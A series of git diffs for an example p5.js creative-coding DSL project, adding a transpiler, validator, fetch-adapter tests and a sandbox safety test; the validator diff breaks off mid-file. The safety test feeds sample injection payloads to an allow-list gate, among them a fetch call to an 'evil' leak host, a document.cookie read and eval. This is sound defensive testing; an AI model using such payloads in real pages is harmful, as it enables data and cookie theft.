+const GRAMMAR = readFileSync(resolve(HERE, "grammar.lark"), "utf8");
+
+/**
+ * Smoke test for FetchAdapter: stand up a fake OpenAI-compatible server,
+ * drive noroshi.generate() through FetchAdapter + CreativeCodingValidator,
+ * and assert the chosen output validates.
+ *
+ * No real LLM, no network — pure HTTP loopback so we can catch transport
+ * regressions without depending on Ollama/llama-server being up.
+ */
+
+const VALID_DSL = [
+  "background black",
+  "fill red",
+  "circle w / 2 h / 2 50",
+].join("\n");
+
+const INVALID_THEN_VALID: string[] = [
+  // First call: malformed (uses a keyword 'dot' that the validator rejects).
+  ["tick {", "  dot mx my 30", "}"].join("\n"),
+  // Second call (after retry): valid.
+  VALID_DSL,
+];
+
+interface ServerHandle {
+  server: Server;
+  url: string;
+  calls: number;
+}
+
+function startStubServer(responder: (callIndex: number, body: unknown) => string): Promise<ServerHandle> {
+  return new Promise((resolveP, rejectP) => {
+    let calls = 0;
+    const server = createServer((req, res) => {
+      let raw = "";
+      req.on("data", (c) => (raw += c));
+      req.on("end", () => {
+        try {
+          const body = raw ? JSON.parse(raw) : null;
+          const content = responder(calls, body);
+          calls++;
+          const payload = { choices: [{ message: { content } }] };
+          res.writeHead(200, { "content-type": "application/json" });
+          res.end(JSON.stringify(payload));
+        } catch (e) {
+          res.writeHead(500, { "content-type": "text/plain" });
+          res.end(String(e));
+        }
+      });
+    });
+    server.on("error", rejectP);
+    server.listen(0, "127.0.0.1", () => {
+      const addr = server.address() as AddressInfo;
+      const handle: ServerHandle = {
+        server,
+        url: `http://127.0.0.1:${addr.port}/v1`,
+        get calls() {
+          return calls;
+        },
+      } as ServerHandle;
+      resolveP(handle);
+    });
+  });
+}
+
+async function runOne(label: string, opts: {
+  responder: (callIndex: number) => string;
+  retry?: number;
+  expectOk: boolean;
+}): Promise<boolean> {
+  const handle = await startStubServer(opts.responder);
+  try {
+    const adapter = new FetchAdapter({
+      endpoint: handle.url,
+      model: "stub-model",
+    });
+    const result = await generate({
+      task: "Draw a red circle in the middle.",
+      grammar: GRAMMAR,
+      examples: FEW_SHOTS,
+      llm: adapter,
+      validator: new CreativeCodingValidator(),
+      retry: opts.retry ? { maxAttempts: opts.retry, includeErrorInPrompt: true } : undefined,
+    });
+
+    const ok = result.validation?.ok === true;
+    const pass = ok === opts.expectOk;
+    console.log(
+      `${pass ? "ok" : "FAIL"}: ${label} — attempts=${result.attempts} validation=${JSON.stringify(result.validation)}`,
+    );
+    return pass;
+  } finally {
+    await new Promise<void>((r) => handle.server.close(() => r()));
+  }
+}
+
+async function main(): Promise<void> {
+  const results: boolean[] = [];
+
+  results.push(
+    await runOne("valid response on first call", {
+      responder: () => VALID_DSL,
+      expectOk: true,
+    }),
+  );
+
+  results.push(
+    await runOne("invalid then valid with retry", {
+      responder: (i) => INVALID_THEN_VALID[Math.min(i, INVALID_THEN_VALID.length - 1)]!,
+      retry: 3,
+      expectOk: true,
+    }),
+  );
+
+  results.push(
+    await runOne("invalid response, no retry → expect validation failure", {
+      responder: () => INVALID_THEN_VALID[0]!,
+      expectOk: false,
+    }),
+  );
+
+  const passed = results.filter(Boolean).length;
+  const failed = results.length - passed;
+  console.log(`\n${passed} passed, ${failed} failed`);
+  if (failed > 0) process.exit(1);
+}
+
+main().catch((e) => {
+  console.error(e);
+  process.exit(1);
+});

--- a/examples/creative-coding-p5js/test-fetch.ts
+++ b/examples/creative-coding-p5js/test-fetch.ts
@@ -1,4 +1,4 @@
-import { createServer, type Server } from "node:http";
+import { createServer, type Server, type IncomingHttpHeaders } from "node:http";
 import { readFileSync } from "node:fs";
 import { dirname, resolve } from "node:path";
 import { fileURLToPath } from "node:url";
@@ -34,26 +34,47 @@ const INVALID_THEN_VALID: string[] = [
   VALID_DSL,
 ];
 
+interface RequestRecord {
+  method: string;
+  headers: IncomingHttpHeaders;
+  body: string;
+}
+
+interface StubResponse {
+  status?: number;
+  body: string;
+  headers?: Record<string, string>;
+}
+
 interface ServerHandle {
   server: Server;
   url: string;
-  calls: number;
+  requests: RequestRecord[];
 }
 
-function startStubServer(responder: (callIndex: number, body: unknown) => string): Promise<ServerHandle> {
+function startStubServer(
+  handler: (req: RequestRecord, callIndex: number) => StubResponse,
+): Promise<ServerHandle> {
   return new Promise((resolveP, rejectP) => {
-    let calls = 0;
+    const requests: RequestRecord[] = [];
     const server = createServer((req, res) => {
       let raw = "";
       req.on("data", (c) => (raw += c));
       req.on("end", () => {
+        const record: RequestRecord = {
+          method: req.method ?? "GET",
+          headers: req.headers,
+          body: raw,
+        };
+        const i = requests.length;
+        requests.push(record);
         try {
-          const body = raw ? JSON.parse(raw) : null;
-          const content = responder(calls, body);
-          calls++;
-          const payload = { choices: [{ message: { content } }] };
-          res.writeHead(200, { "content-type": "application/json" });
-          res.end(JSON.stringify(payload));
+          const r = handler(record, i);
+          res.writeHead(r.status ?? 200, {
+            "content-type": "application/json",
+            ...r.headers,
+          });
+          res.end(r.body);
         } catch (e) {
           res.writeHead(500, { "content-type": "text/plain" });
           res.end(String(e));
@@ -63,16 +84,22 @@ function startStubServer(responder: (callIndex: number, body: unknown) => string
     server.on("error", rejectP);
     server.listen(0, "127.0.0.1", () => {
       const addr = server.address() as AddressInfo;
-      const handle: ServerHandle = {
+      resolveP({
         server,
         url: `http://127.0.0.1:${addr.port}/v1`,
-        get calls() {
-          return calls;
-        },
-      } as ServerHandle;
-      resolveP(handle);
+        requests,
+      });
     });
   });
+}
+
+/** Convenience: turn a string→string responder into an OpenAI-shaped 200. */
+function jsonOk(content: string): StubResponse {
+  return { body: JSON.stringify({ choices: [{ message: { content } }] }) };
+}
+
+async function closeServer(handle: ServerHandle): Promise<void> {
+  await new Promise<void>((r) => handle.server.close(() => r()));
 }
 
 async function runOne(label: string, opts: {
@@ -81,7 +108,7 @@ async function runOne(label: string, opts: {
   expectOk: boolean;
   rawCompletion?: boolean;
 }): Promise<boolean> {
-  const handle = await startStubServer(opts.responder);
+  const handle = await startStubServer((_req, i) => jsonOk(opts.responder(i)));
   try {
     const adapter = new FetchAdapter({
       endpoint: handle.url,
@@ -104,8 +131,28 @@ async function runOne(label: string, opts: {
     );
     return pass;
   } finally {
-    await new Promise<void>((r) => handle.server.close(() => r()));
+    await closeServer(handle);
   }
+}
+
+async function expectThrows(
+  label: string,
+  fn: () => Promise<unknown>,
+  mustInclude?: string,
+): Promise<boolean> {
+  try {
+    await fn();
+  } catch (e) {
+    const msg = (e as Error).message ?? String(e);
+    if (mustInclude && !msg.includes(mustInclude)) {
+      console.error(`FAIL: ${label} — message lacked "${mustInclude}": ${msg}`);
+      return false;
+    }
+    console.log(`ok: ${label} → threw "${msg.slice(0, 100)}"`);
+    return true;
+  }
+  console.error(`FAIL: ${label} — expected throw, but call returned`);
+  return false;
 }
 
 async function main(): Promise<void> {
@@ -159,6 +206,84 @@ async function main(): Promise<void> {
       expectOk: false,
     }),
   );
+
+  // 5xx response: FetchAdapter must throw and the error message must
+  // carry the upstream status + body snippet to make debugging tractable.
+  {
+    const handle = await startStubServer(() => ({
+      status: 503,
+      headers: { "content-type": "text/plain" },
+      body: "upstream model is loading",
+    }));
+    const adapter = new FetchAdapter({ endpoint: handle.url, model: "stub-model" });
+    results.push(
+      await expectThrows(
+        "5xx surfaces as adapter throw",
+        () =>
+          generate({
+            task: "Draw a red circle.",
+            grammar: GRAMMAR,
+            examples: FEW_SHOTS,
+            llm: adapter,
+            validator: new CreativeCodingValidator(),
+          }),
+        "503",
+      ),
+    );
+    await closeServer(handle);
+  }
+
+  // 200 with the wrong shape: no choices, or message.content not a string.
+  // Adapter must throw with a self-explanatory error rather than silently
+  // returning undefined / "[object Object]".
+  {
+    const handle = await startStubServer(() => ({
+      body: JSON.stringify({ choices: [{ message: { reasoning: "thinking..." } }] }),
+    }));
+    const adapter = new FetchAdapter({ endpoint: handle.url, model: "stub-model" });
+    results.push(
+      await expectThrows(
+        "missing message.content throws with shape hint",
+        () =>
+          generate({
+            task: "Draw a red circle.",
+            grammar: GRAMMAR,
+            examples: FEW_SHOTS,
+            llm: adapter,
+            validator: new CreativeCodingValidator(),
+          }),
+        "unexpected response",
+      ),
+    );
+    await closeServer(handle);
+  }
+
+  // apiKey forwarding: the option lands as "Authorization: Bearer <key>"
+  // on the wire. Verify by inspecting the request the stub server received.
+  {
+    const handle = await startStubServer(() => jsonOk(VALID_DSL));
+    const adapter = new FetchAdapter({
+      endpoint: handle.url,
+      model: "stub-model",
+      apiKey: "sk-test-abc",
+    });
+    await generate({
+      task: "Draw a red circle.",
+      grammar: GRAMMAR,
+      examples: FEW_SHOTS,
+      llm: adapter,
+      validator: new CreativeCodingValidator(),
+    });
+    const auth = handle.requests[0]?.headers.authorization;
+    const ok = auth === "Bearer sk-test-abc";
+    if (ok) {
+      console.log(`ok: apiKey forwarded as Authorization header`);
+    } else {
+      console.error(`FAIL: apiKey forwarding — got "${auth}", want "Bearer sk-test-abc"`);
+    }
+    results.push(ok);
+    await closeServer(handle);
+  }
 
   const passed = results.filter(Boolean).length;
   const failed = results.length - passed;

--- a/examples/creative-coding-p5js/test-safety.ts
+++ b/examples/creative-coding-p5js/test-safety.ts
@@ -1,0 +1,127 @@
+/**
+ * Unit test for assertSafeP5 — the allow-list gate that sits between the
+ * transpiler and `new Function(...)` in the browser harness. Confirms that
+ * (a) every transpile output from the few-shot bank passes the gate, and
+ * (b) representative attack payloads injected after transpile are rejected.
+ *
+ * Run: `npx tsx examples/creative-coding-p5js/test-safety.ts`
+ */
+
+// @ts-expect-error — .mjs has no .d.ts; runtime import is fine under tsx.
+import { assertSafeP5 } from "./harness.mjs";
+
+import { FEW_SHOTS } from "./examples.js";
+import { transpile } from "./transpile.js";
+
+let pass = 0;
+let fail = 0;
+
+function ok(label: string): void {
+  console.log(`ok: ${label}`);
+  pass++;
+}
+
+function bad(label: string, why: string): void {
+  console.error(`FAIL: ${label} — ${why}`);
+  fail++;
+}
+
+function expectAccept(label: string, js: string): void {
+  try {
+    assertSafeP5(js);
+    ok(label);
+  } catch (e) {
+    bad(label, `unexpectedly rejected: ${(e as Error).message}`);
+  }
+}
+
+function expectReject(label: string, js: string, mustInclude?: string): void {
+  try {
+    assertSafeP5(js);
+    bad(label, "should have been rejected but passed");
+  } catch (e) {
+    const msg = (e as Error).message;
+    if (mustInclude && !msg.includes(mustInclude)) {
+      bad(label, `rejected but message didn't include "${mustInclude}": ${msg}`);
+      return;
+    }
+    ok(`${label} → rejected (${msg})`);
+  }
+}
+
+// (a) Every few-shot's transpile output must pass.
+for (const ex of FEW_SHOTS) {
+  const js = transpile(ex.output);
+  expectAccept(`few-shot transpile passes: ${ex.input}`, js);
+}
+
+// (b) Attack payloads that could land in the transpile output if the
+//     transpiler or validator ever regresses must be rejected.
+expectReject(
+  "eval()",
+  "function draw() { eval('alert(1)'); }",
+  "eval",
+);
+
+expectReject(
+  "Function constructor",
+  "function draw() { new Function('return process')(); }",
+  "Function",
+);
+
+expectReject(
+  "window access",
+  "function draw() { window.location = 'http://evil'; }",
+  "window",
+);
+
+expectReject(
+  "document.cookie",
+  "function draw() { var x = document.cookie; }",
+  "document",
+);
+
+expectReject(
+  "fetch()",
+  "function draw() { fetch('http://evil/leak'); }",
+  "fetch",
+);
+
+expectReject(
+  "__proto__ pollution",
+  "function draw() { ({}).__proto__.x = 1; }",
+  "__proto__",
+);
+
+expectReject(
+  "constructor escape",
+  "function draw() { ({}).constructor; }",
+  "constructor",
+);
+
+expectReject(
+  "setTimeout()",
+  "function draw() { setTimeout(() => {}, 100); }",
+  "setTimeout",
+);
+
+expectReject(
+  "disallowed p5 call (alert)",
+  "function draw() { alert('hi'); }",
+  "alert",
+);
+
+expectReject(
+  "disallowed p5 call (text)",
+  "function draw() { text('xss', 10, 10); }",
+  "text",
+);
+
+// Sanity: a benign for-loop with allow-listed calls only must pass.
+expectAccept(
+  "for-loop with circle()",
+  "function setup() { createCanvas(400, 400); noLoop(); }\nfunction draw() { for (let __i = 0; __i < 10; __i++) { circle(__i * 10, 100, 5); } }",
+);
+
+console.log(`\n${pass} passed, ${fail} failed`);
+if (fail > 0) process.exit(1);

--- a/examples/creative-coding-p5js/test.ts
+++ b/examples/creative-coding-p5js/test.ts
@@ -55,5 +55,37 @@ for (const [label, src] of NEG) {
   }
 }
 
+// Regression: mixed top-level + tick block must route top-level stmts to
+// setup() (run-once) instead of dropping them.
+const MIXED_SRC = [
+  "background black",
+  "tick {",
+  "  fill yellow",
+  "  circle mx my 30",
+  "}",
+].join("\n");
+{
+  const r = v.validate(MIXED_SRC);
+  if (!r.ok) {
+    console.error(`FAIL mixed-block validator: ${r.error}`);
+    fail++;
+  } else {
+    const js = transpile(MIXED_SRC);
+    const setupBlock = js.match(/function setup\(\) \{([\s\S]*?)\n\}/)?.[1] ?? "";
+    const drawBlock = js.match(/function draw\(\) \{([\s\S]*?)\n\}/)?.[1] ?? "";
+    const errs: string[] = [];
+    if (!setupBlock.includes("background(")) errs.push("setup() missing background()");
+    if (drawBlock.includes("background(")) errs.push("draw() unexpectedly has background()");
+    if (!drawBlock.includes("circle(")) errs.push("draw() missing circle()");
+    if (errs.length > 0) {
+      console.error(`FAIL mixed-block transpile:\n  ${errs.join("\n  ")}\n${js}`);
+      fail++;
+    } else {
+      console.log("ok-mixed: top-level + tick routes top-level stmt to setup()");
+      pass++;
+    }
+  }
+}
+
 console.log(`\n${pass} passed, ${fail} failed`);
 if (fail > 0) process.exit(1);

--- a/examples/creative-coding-p5js/test.ts
+++ b/examples/creative-coding-p5js/test.ts
@@ -1,0 +1,59 @@
+/**
+ * Quick smoke test for the example pipeline.
+ * Runs the validator and transpiler over every few-shot in `examples.ts`
+ * to confirm the grammar v0 is self-consistent.
+ *
+ * Run with: `npx tsx examples/creative-coding-p5js/test.ts`
+ */
+
+import { FEW_SHOTS } from "./examples.js";
+import { CreativeCodingValidator } from "./validator.js";
+import { transpile } from "./transpile.js";
+
+const v = new CreativeCodingValidator();
+let pass = 0, fail = 0;
+
+for (const ex of FEW_SHOTS) {
+  const r = v.validate(ex.output);
+  if (!r.ok) {
+    console.error(`FAIL validator: ${ex.input}\n  error: ${r.error}\n  output:\n${ex.output}\n`);
+    fail++;
+    continue;
+  }
+  let js: string;
+  try {
+    js = transpile(ex.output);
+  } catch (e) {
+    console.error(`FAIL transpiler: ${ex.input}: ${(e as Error).message}`);
+    fail++;
+    continue;
+  }
+  if (!/function setup\(\)/.test(js) || !/function draw\(\)/.test(js)) {
+    console.error(`FAIL transpiler shape: ${ex.input}\n${js}`);
+    fail++;
+    continue;
+  }
+  console.log(`ok: ${ex.input}`);
+  pass++;
+}
+
+// Negative tests
+const NEG: Array<[string, string]> = [
+  ["unknown keyword", "circle 10 10 10\nflubber"],
+  ["wrong arity", "circle 10 10"],
+  ["unbalanced brace", "tick {\n  circle 1 2 3\n"],
+  ["bare identifier in expr", "circle foo 10 10"],
+];
+for (const [label, src] of NEG) {
+  const r = v.validate(src);
+  if (r.ok) {
+    console.error(`FAIL negative (${label}) should have errored but passed`);
+    fail++;
+  } else {
+    console.log(`ok-neg: ${label} → ${r.error}`);
+    pass++;
+  }
+}
+
+console.log(`\n${pass} passed, ${fail} failed`);
+if (fail > 0) process.exit(1);

--- a/examples/creative-coding-p5js/transpile.ts
+++ b/examples/creative-coding-p5js/transpile.ts
@@ -1,0 +1,277 @@
+/**
+ * noroshi-creative DSL → p5.js source.
+ *
+ * Strategy: tokenise once, walk linearly mirroring the validator's grammar.
+ * The transpiler trusts that input has already been validated; behavior on
+ * invalid input is undefined.
+ *
+ * Output shape:
+ *
+ *   function setup() { createCanvas(W, H); <SETUP_BODY> }
+ *   function draw()  { <TICK_BODY_OR_FULL_PROGRAM> }
+ *
+ * If the program contains no `setup`/`tick` blocks, all top-level statements
+ * are emitted into draw() ONCE — i.e. `noLoop()` is called at the end of
+ * setup. Mixing top-level stmts with a `tick` block puts top-level stmts in
+ * setup; with no `tick`, draw is single-shot.
+ */
+
+const CANVAS_W = 400;
+const CANVAS_H = 400;
+
+interface Tok { kind: string; value: string }
+
+function lex(src: string): Tok[] {
+  const toks: Tok[] = [];
+  let i = 0;
+  while (i < src.length) {
+    const c = src[i]!;
+    if (c === "/" && src[i + 1] === "/") {
+      while (i < src.length && src[i] !== "\n") i++;
+      continue;
+    }
+    if (/\s/.test(c)) { i++; continue; }
+    if ("{}(),".includes(c)) { toks.push({ kind: c, value: c }); i++; continue; }
+    if ("+-*/".includes(c)) {
+      if (c === "-" && /\d/.test(src[i + 1] ?? "") && !isOperand(toks)) {
+        // fallthrough → number
+      } else {
+        toks.push({ kind: "op", value: c });
+        i++;
+        continue;
+      }
+    }
+    if (c === "-" || /\d/.test(c)) {
+      const s = i;
+      if (c === "-") i++;
+      while (i < src.length && /[\d.]/.test(src[i]!)) i++;
+      toks.push({ kind: "num", value: src.slice(s, i) });
+      continue;
+    }
+    if (/[A-Za-z_]/.test(c)) {
+      const s = i;
+      while (i < src.length && /[A-Za-z0-9_]/.test(src[i]!)) i++;
+      toks.push({ kind: "ident", value: src.slice(s, i) });
+      continue;
+    }
+    // unknown char — skip defensively (validator should have caught it)
+    i++;
+  }
+  return toks;
+}
+
+function isOperand(toks: Tok[]): boolean {
+  const last = toks[toks.length - 1];
+  if (!last) return false;
+  return last.kind === "num" || last.kind === "ident" || last.value === ")";
+}
+
+const COLORS: Record<string, string> = {
+  red: "'#e74c3c'", blue: "'#3498db'", green: "'#2ecc71'",
+  yellow: "'#f1c40f'", white: "'#ffffff'", black: "'#000000'",
+  pink: "'#ff8fb1'", purple: "'#9b59b6'", orange: "'#e67e22'",
+  gray: "'#95a5a6'",
+};
+
+const VAR_MAP: Record<string, string> = {
+  t: "(millis()/1000)",
+  f: "frameCount",
+  w: "width",
+  h: "height",
+  mx: "mouseX",
+  my: "mouseY",
+  i: "__i",
+};
+
+class Transpiler {
+  private p = 0;
+  constructor(private readonly toks: Tok[]) {}
+  peek(o = 0): Tok | undefined { return this.toks[this.p + o]; }
+  eat(): Tok | undefined { return this.toks[this.p++]; }
+
+  /** Transpile a sequence of stmts until brace close or EOF. */
+  stmts(stopOnBrace: boolean): string[] {
+    const out: string[] = [];
+    while (this.peek() && !(stopOnBrace && this.peek()!.kind === "}")) {
+      out.push(this.stmt());
+    }
+    return out;
+  }
+
+  stmt(): string {
+    const t = this.eat()!;
+    if (t.kind !== "ident") return "";
+    switch (t.value) {
+      case "background": return `background(${this.color()});`;
+      case "fill":       return `fill(${this.color()});`;
+      case "stroke":     return `stroke(${this.color()});`;
+      case "no_fill":    return "noFill();";
+      case "no_stroke":  return "noStroke();";
+      case "push":       return "push();";
+      case "pop":        return "pop();";
+      case "rotate":     return `rotate(${this.expr()});`;
+      case "translate":  return `translate(${this.expr()}, ${this.expr()});`;
+      case "circle": {
+        const x = this.expr(), y = this.expr(), r = this.expr();
+        return `circle(${x}, ${y}, ${r} * 2);`;
+      }
+      case "square": {
+        const x = this.expr(), y = this.expr(), s = this.expr();
+        return `square(${x}, ${y}, ${s});`;
+      }
+      case "rect": {
+        const x = this.expr(), y = this.expr(), w = this.expr(), h = this.expr();
+        return `rect(${x}, ${y}, ${w}, ${h});`;
+      }
+      case "line": {
+        const a = this.expr(), b = this.expr(), c = this.expr(), d = this.expr();
+        return `line(${a}, ${b}, ${c}, ${d});`;
+      }
+      case "repeat": {
+        const n = this.eat()!.value;
+        // consume "{" ... "}"
+        this.eat(); // {
+        const body = this.stmts(true);
+        this.eat(); // }
+        return `for (let __i = 0; __i < ${n}; __i++) { ${body.join(" ")} }`;
+      }
+    }
+    return "";
+  }
+
+  color(): string {
+    const t = this.eat()!;
+    if (t.value === "rgb") {
+      this.eat(); // (
+      const r = this.expr(); this.eat(); // ,
+      const g = this.expr(); this.eat(); // ,
+      const b = this.expr(); this.eat(); // )
+      return `${r}, ${g}, ${b}`;
+    }
+    return COLORS[t.value] ?? "'#888'";
+  }
+
+  expr(): string { return this.exprBp(0); }
+
+  /**
+   * Pratt-style operator precedence (additive=10, multiplicative=20).
+   * Output JS infix with explicit parens around each binary op for safety.
+   */
+  exprBp(minBp: number): string {
+    let lhs = this.factor();
+    while (true) {
+      const t = this.peek();
+      if (!t || t.kind !== "op") break;
+      const bp = t.value === "+" || t.value === "-" ? 10 : 20;
+      if (bp < minBp) break;
+      const op = this.eat()!.value;
+      const rhs = this.exprBp(bp + 1);
+      lhs = `(${lhs} ${op} ${rhs})`;
+    }
+    return lhs;
+  }
+
+  factor(): string {
+    const t = this.eat()!;
+    if (t.kind === "num") return t.value;
+    if (t.value === "(") {
+      const e = this.exprBp(0);
+      this.eat(); // )
+      return `(${e})`;
+    }
+    if (t.kind === "ident") {
+      // function call?
+      if (this.peek()?.value === "(") {
+        this.eat(); // (
+        const args: string[] = [this.exprBp(0)];
+        while (this.peek()?.kind === ",") { this.eat(); args.push(this.exprBp(0)); }
+        this.eat(); // )
+        return `${t.value}(${args.join(", ")})`;
+      }
+      return VAR_MAP[t.value] ?? t.value;
+    }
+    return "0";
+  }
+}
+
+interface BlockSplit {
+  setup: string[];
+  tick: string[];
+  top: string[];
+  hadTick: boolean;
+}
+
+/**
+ * Split the program into setup / tick / top-level by scanning for
+ * `setup { ... }` and `tick { ... }` markers, then transpile each.
+ */
+function split(toks: Tok[]): BlockSplit {
+  const r: BlockSplit = { setup: [], tick: [], top: [], hadTick: false };
+  let i = 0;
+  while (i < toks.length) {
+    const t = toks[i]!;
+    if (t.kind === "ident" && (t.value === "setup" || t.value === "tick") && toks[i + 1]?.kind === "{") {
+      const which = t.value;
+      const start = i + 2;
+      let depth = 1, j = start;
+      while (j < toks.length && depth > 0) {
+        if (toks[j]!.kind === "{") depth++;
+        else if (toks[j]!.kind === "}") depth--;
+        if (depth > 0) j++;
+      }
+      const slice = toks.slice(start, j);
+      const out = new Transpiler(slice).stmts(false);
+      if (which === "setup") r.setup.push(...out);
+      else { r.tick.push(...out); r.hadTick = true; }
+      i = j + 1;
+      continue;
+    }
+    // top-level stmt: hand a single-stmt slice to the transpiler.
+    const start = i;
+    // a stmt starts with an ident keyword; advance i to the next ident that
+    // starts a new stmt OR EOF. Cheap heuristic: scan until we hit another
+    // top-level keyword that we recognize as a stmt starter, balancing braces
+    // & parens.
+    i++;
+    let depth = 0;
+    while (i < toks.length) {
+      const u = toks[i]!;
+      if (u.kind === "{" || u.kind === "(") depth++;
+      else if (u.kind === "}" || u.kind === ")") depth--;
+      else if (
+        depth === 0 &&
+        u.kind === "ident" &&
+        STMT_STARTERS.has(u.value)
+      ) break;
+      i++;
+    }
+    const slice = toks.slice(start, i);
+    r.top.push(...new Transpiler(slice).stmts(false));
+  }
+  return r;
+}
+
+const STMT_STARTERS = new Set([
+  "setup", "tick",
+  "circle", "square", "rect", "line",
+  "fill", "stroke", "no_fill", "no_stroke",
+  "background",
+  "rotate", "translate", "push", "pop",
+  "repeat",
+]);
+
+/** Public entry: noroshi-creative source → p5.js sketch source. */
+export function transpile(src: string): string {
+  const toks = lex(src);
+  const { setup, tick, top, hadTick } = split(toks);
+
+  const setupBody = [
+    `createCanvas(${CANVAS_W}, ${CANVAS_H});`,
+    ...setup,
+    ...(hadTick ? [] : ["noLoop();"]),
+  ].join("\n  ");
+
+  const drawBody = (hadTick ? tick : top).join("\n  ") || "/* empty */";
+
+  return `function setup() {\n  ${setupBody}\n}\n\nfunction draw() {\n  ${drawBody}\n}\n`;
+}

--- a/examples/creative-coding-p5js/transpile.ts
+++ b/examples/creative-coding-p5js/transpile.ts
@@ -265,9 +265,13 @@ export function transpile(src: string): string {
   const toks = lex(src);
   const { setup, tick, top, hadTick } = split(toks);
 
+  // When a program mixes top-level stmts with a tick block, the top-level
+  // stmts run once and become part of setup() (per DESIGN.md). Without a tick
+  // block they go straight into draw() and we noLoop() at the end of setup.
   const setupBody = [
     `createCanvas(${CANVAS_W}, ${CANVAS_H});`,
     ...setup,
+    ...(hadTick ? top : []),
     ...(hadTick ? [] : ["noLoop();"]),
   ].join("\n  ");
 

--- a/examples/creative-coding-p5js/tsconfig.json
+++ b/examples/creative-coding-p5js/tsconfig.json
@@ -1,0 +1,16 @@
+{
+  "compilerOptions": {
+    "target": "ES2022",
+    "module": "ESNext",
+    "moduleResolution": "Bundler",
+    "lib": ["ES2022", "DOM"],
+    "strict": true,
+    "esModuleInterop": true,
+    "noUncheckedIndexedAccess": true,
+    "skipLibCheck": true,
+    "noEmit": true,
+    "allowImportingTsExtensions": false,
+    "rootDir": "../.."
+  },
+  "include": ["./**/*.ts", "../../src/**/*.ts"]
+}

--- a/examples/creative-coding-p5js/validator.ts
+++ b/examples/creative-coding-p5js/validator.ts
@@ -1,0 +1,279 @@
+import type { Validator, ValidationResult } from "../../src/index.js";
+
+/**
+ * Minimal validator for the noroshi-creative DSL.
+ *
+ * NOT a full parser — does enough to catch common LLM mistakes:
+ *  - unknown tokens (typos, extra English words)
+ *  - unbalanced braces / parens
+ *  - shapes called with wrong arity
+ *  - bare numbers / unknown function names in expressions
+ *
+ * Once nearley is wired in, this can be replaced by a real parser. For PoC
+ * the goal is "good enough to drive retry-with-feedback".
+ */
+
+const KEYWORDS = new Set([
+  "setup", "tick",
+  "circle", "square", "rect", "line",
+  "fill", "stroke", "no_fill", "no_stroke",
+  "background",
+  "rotate", "translate", "push", "pop",
+  "repeat",
+  "rgb",
+]);
+
+const COLOR_NAMES = new Set([
+  "red", "blue", "green", "yellow",
+  "white", "black", "pink", "purple",
+  "orange", "gray",
+]);
+
+const VARS = new Set(["t", "f", "w", "h", "mx", "my", "i"]);
+const FUNCS = new Set(["sin", "cos", "random", "abs"]);
+
+/** Token shape coming out of the lexer below. */
+interface Tok {
+  kind:
+    | "kw" | "color" | "var" | "func"
+    | "num" | "lbrace" | "rbrace" | "lparen" | "rparen"
+    | "comma" | "op";
+  value: string;
+  pos: number;
+}
+
+function lex(src: string): Tok[] | { error: string } {
+  const toks: Tok[] = [];
+  let i = 0;
+  while (i < src.length) {
+    const c = src[i]!;
+    if (c === "/" && src[i + 1] === "/") {
+      while (i < src.length && src[i] !== "\n") i++;
+      continue;
+    }
+    if (/\s/.test(c)) { i++; continue; }
+    if (c === "{") { toks.push({ kind: "lbrace", value: c, pos: i }); i++; continue; }
+    if (c === "}") { toks.push({ kind: "rbrace", value: c, pos: i }); i++; continue; }
+    if (c === "(") { toks.push({ kind: "lparen", value: c, pos: i }); i++; continue; }
+    if (c === ")") { toks.push({ kind: "rparen", value: c, pos: i }); i++; continue; }
+    if (c === ",") { toks.push({ kind: "comma", value: c, pos: i }); i++; continue; }
+    if ("+-*/".includes(c)) {
+      // Could be a unary minus on a number — let the parser sort it out.
+      // For "-" followed by a digit with no preceding operand, treat as part
+      // of a number to allow negative literals.
+      if (c === "-" && /\d/.test(src[i + 1] ?? "") && !isOperandTail(toks)) {
+        // fall through to number branch
+      } else {
+        toks.push({ kind: "op", value: c, pos: i });
+        i++;
+        continue;
+      }
+    }
+    if (c === "-" || /\d/.test(c)) {
+      const start = i;
+      if (c === "-") i++;
+      while (i < src.length && /[\d.]/.test(src[i]!)) i++;
+      toks.push({ kind: "num", value: src.slice(start, i), pos: start });
+      continue;
+    }
+    if (/[A-Za-z_]/.test(c)) {
+      const start = i;
+      while (i < src.length && /[A-Za-z0-9_]/.test(src[i]!)) i++;
+      const w = src.slice(start, i);
+      if (KEYWORDS.has(w)) toks.push({ kind: "kw", value: w, pos: start });
+      else if (COLOR_NAMES.has(w)) toks.push({ kind: "color", value: w, pos: start });
+      else if (VARS.has(w)) toks.push({ kind: "var", value: w, pos: start });
+      else if (FUNCS.has(w)) toks.push({ kind: "func", value: w, pos: start });
+      else return { error: `unknown identifier "${w}" at offset ${start}` };
+      continue;
+    }
+    return { error: `unexpected character "${c}" at offset ${i}` };
+  }
+  return toks;
+}
+
+function isOperandTail(toks: Tok[]): boolean {
+  const last = toks[toks.length - 1];
+  if (!last) return false;
+  return last.kind === "num" || last.kind === "var" || last.kind === "rparen";
+}
+
+/** Arity of each shape/transform keyword (in expressions, post-keyword). */
+const ARITY: Record<string, number> = {
+  circle: 3, square: 3, rect: 4, line: 4,
+  rotate: 1, translate: 2,
+};
+
+class Parser {
+  private p = 0;
+  constructor(private readonly toks: Tok[]) {}
+
+  peek(o = 0): Tok | undefined { return this.toks[this.p + o]; }
+  eat(): Tok | undefined { return this.toks[this.p++]; }
+
+  parse(): ValidationResult {
+    while (this.p < this.toks.length) {
+      const r = this.block();
+      if (!r.ok) return r;
+    }
+    return { ok: true };
+  }
+
+  block(): ValidationResult {
+    const t = this.peek();
+    if (!t) return { ok: true };
+    if (t.kind === "kw" && (t.value === "setup" || t.value === "tick")) {
+      this.eat();
+      return this.braceBlock();
+    }
+    return this.stmt();
+  }
+
+  braceBlock(): ValidationResult {
+    const open = this.eat();
+    if (!open || open.kind !== "lbrace") {
+      return { ok: false, error: `expected "{" at offset ${open?.pos ?? -1}` };
+    }
+    while (this.peek() && this.peek()!.kind !== "rbrace") {
+      const r = this.stmt();
+      if (!r.ok) return r;
+    }
+    const close = this.eat();
+    if (!close || close.kind !== "rbrace") {
+      return { ok: false, error: "unbalanced { ... } block" };
+    }
+    return { ok: true };
+  }
+
+  stmt(): ValidationResult {
+    const t = this.peek();
+    if (!t) return { ok: false, error: "unexpected end of input" };
+    if (t.kind !== "kw") {
+      return { ok: false, error: `expected a statement keyword at offset ${t.pos}, got "${t.value}"` };
+    }
+    this.eat();
+    switch (t.value) {
+      case "fill":
+      case "stroke":
+      case "background":
+        return this.color();
+      case "no_fill":
+      case "no_stroke":
+      case "push":
+      case "pop":
+        return { ok: true };
+      case "rgb":
+        return { ok: false, error: `"rgb" cannot start a statement (use it after fill/stroke/background)` };
